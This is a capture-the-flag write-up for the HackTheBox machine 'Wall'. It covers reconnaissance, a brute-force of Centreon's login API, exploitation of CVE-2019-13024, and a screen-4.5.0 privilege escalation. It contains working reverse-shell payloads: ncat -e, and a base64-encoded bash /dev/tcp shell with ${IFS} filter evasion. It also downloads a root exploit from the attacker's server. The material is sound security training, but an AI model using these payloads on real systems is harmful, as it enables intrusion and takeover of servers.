Wall - HackTheBox

Information gathering

Let's start with a port scan:

$ nmap -A -T4 10.10.10.157
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 19:40 EDT
Nmap scan report for 10.10.10.157
Host is up (0.090s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
|   256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_  256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.53 seconds

The web server has the Apache's default homepage.

Running a quick discovery gives us some pages to visit:

$ gobuster dir -q -t 40 -w raft-medium-files.txt -u http://10.10.10.157
/index.html (Status: 200)
/panel.php (Status: 200)
/wp-forum.phps (Status: 403)
/aa.php (Status: 200)
$ gobuster dir -q -t 40 -w raft-medium-directories.txt -u http://10.10.10.157
/monitoring (Status: 401)
/server-status (Status: 403)

Exploration

/aa.php and /panel.php do not contain anything useful and /monitoring is protected by HTTP basic authentication, which I tried to bruteforce with no success. After a bit of tinkering, I found that making a POST request to /monitoring redirects you to a page containing a link to /centreon:

$ curl -X POST -L http://10.10.10.157/monitoring
<h1>This page is not ready yet !</h1>
<h2>We should redirect you to the required page !</h2>

<meta http-equiv="refresh" content="0; URL='/centreon'" />

Visiting /centreon we find ourselves in front of a login form for the Centreon platform, which is a system monitoring tool:

Let's try to login with a random username and password, and intercept the request with Burp:

The login process uses a token that changes with every request, so we can not use hydra to do a bruteforce. We might write a script that fetches the token and makes the login request, but whenever I stumble upon new web applications, I like to learn how the mechanisms behind them are implemented. Centreon, in this case, have an API that can be used to authenticate users and get a token. We can then use wfuzz to find valid combination of username and password.

Before we launch the bruteforce, let's check if the API endpoint is up and running:

$ curl -d "username=test&password=test" "http://10.10.10.157/centreon/api/index.php?action=authenticate"
"Bad credentials"

Ok, the authentication API works. A quick search tells us that the default username on Centreon is admin, so let's start a bruteforce on that:

$ wfuzz -c --hc 403  -w probable-v2-top1575.txt -d 'username=admin&password=FUZZ' "http://10.10.10.157/centreon/api/index.php?action=authenticate"
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://10.10.10.157/centreon/api/index.php?action=authenticate
Total requests: 1575

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000048:   200        0 L      1 W      61 Ch       "password1"

Total time: 12.86365
Processed Requests: 1575
Filtered Requests: 1574
Requests/sec.: 122.4380

Nice! Look's like admin's password is password1! Let's use it to login.

Exploiting

Here is the panel after logging in: The menu on the right of the Centreon panel allows us to discover it's version by going on Administration > About, and it's 19.04.0 commit f2a106936.

A search on Google immediately points us toward a remote code execution identified by CVE-2019-13024:

Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allows the attacker to execute arbitrary system commands by using the value "init_script"-"Monitoring Engine Binary" in main.get.php to insert a arbitrary command into the database, and execute it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php (which passes the inserted value to the database to shell_exec without sanitizing it, allowing one to execute system arbitrary commands).

The identification code for the exploit is 47069 on exploit-db, so let's download it with searchsploit -m 47069. Let's have a look at the payload section:

payload_info = {
    "name": "Central",
    "ns_ip_address": "127.0.0.1",
    # this value should be 1 always
    "localhost[localhost]": "1",
    "is_default[is_default]": "0",
    "remote_id": "",
    "ssh_port": "22",
    "init_script": "centengine",
    # this value contains the payload , you can change it as you want
    "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
    "nagiostats_bin": "/usr/sbin/centenginestats",
    "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
    "centreonbroker_cfg_path": "/etc/centreon-broker",
    "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
    "centreonbroker_logs_path": "",
    "centreonconnector_path": "/usr/lib64/centreon-connector",
    "init_script_centreontrapd": "centreontrapd",
    "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
    "ns_activate[ns_activate]": "1",
    "submitC": "Save",
    "id": "1",
    "o": "c",
    "centreon_token": poller_token,
}

The nagios_bin field is the one that will be executed on the server. The first thing to do is to launch a netcat listener on our machine with nc -lnvp 1337.

The first thing that we should do is to change all the URLs in the script by prepending /centreon to them, as this is the location that it's installed to on the machine.

Launching the exploit with our ip address and port, to get a reverse shell, does not work, because there might be some characters that are not allowed in the command. Let's try to create a string that could bypass the protections.
We can encode with base64 our command to avoid using characters like > and &:

$ echo -n "/bin/bash -i >& /dev/tcp/10.10.14.4/1337 0>&1" | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvMTMzNyAwPiYx

I used a bash reverse shell command to connect to our netcat listener because I don't know which is the version of it on the server (if present at all), as the syntax may vary from one to another.

Ok, now we have a base64 encoded reverse shell command. Let's add the decoding command and pipe the result in bash:

echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvMTMzNyAwPiYx | base64 -d | sh

Now let's set nagios_bin to use this command and remove the .format(ip, port) as it's not needed anymore:

"nagios_bin": "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvMTMzNyAwPiYx | base64 -d | bash",

It still does not work, probably because of white spaces, so let's replace them with ${IFS}:

"nagios_bin": "echo${IFS}L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvMTMzNyAwPiYx|base64${IFS}-d|bash",

This still does not work, probably because of some sort of command concatenation error, so let's add a ; after the bash command

"nagios_bin": "echo${IFS}L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvMTMzNyAwPiYx|base64${IFS}-d|bash;",

This time we finally have a connection from the server, so the exploit worked!

$ nc -lnvp 1337
bash: cannot set terminal process group (982): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Wall:/usr/local/centreon/www$

Privilege escalation

At first I saw this message [+] We can connect to the local MYSQL service as 'root' and without a password! and I tried to use mysql to get a shell, but I could not get a stable output because of the shell running on netcat. I continued reading LinEnum's output and I found an unusual executable in the SUID files section:

It is screen-4.5.0, and luckily, there's a handy local root exploit on exploit-db. After downloading it on our machine, let's start a web server with python -m http.server 8080 and let's download it on the remote machine with wget http://10.10.14.4:8080/41154.sh. Just run it and a couple of seconds later we should have a root shell! Let's read the flags:

$ wc -c /home/shelby/user.txt
33 /home/shelby/user.txt

$ wc -c /root/root.txt
33 /root/root.txt

I really couldn't find a way from www-data to shelby, except for some hashes in /etc/shadow but I couldn't crack them, I guess I'll wait for Ippsec's writeup!

Thanks for reading!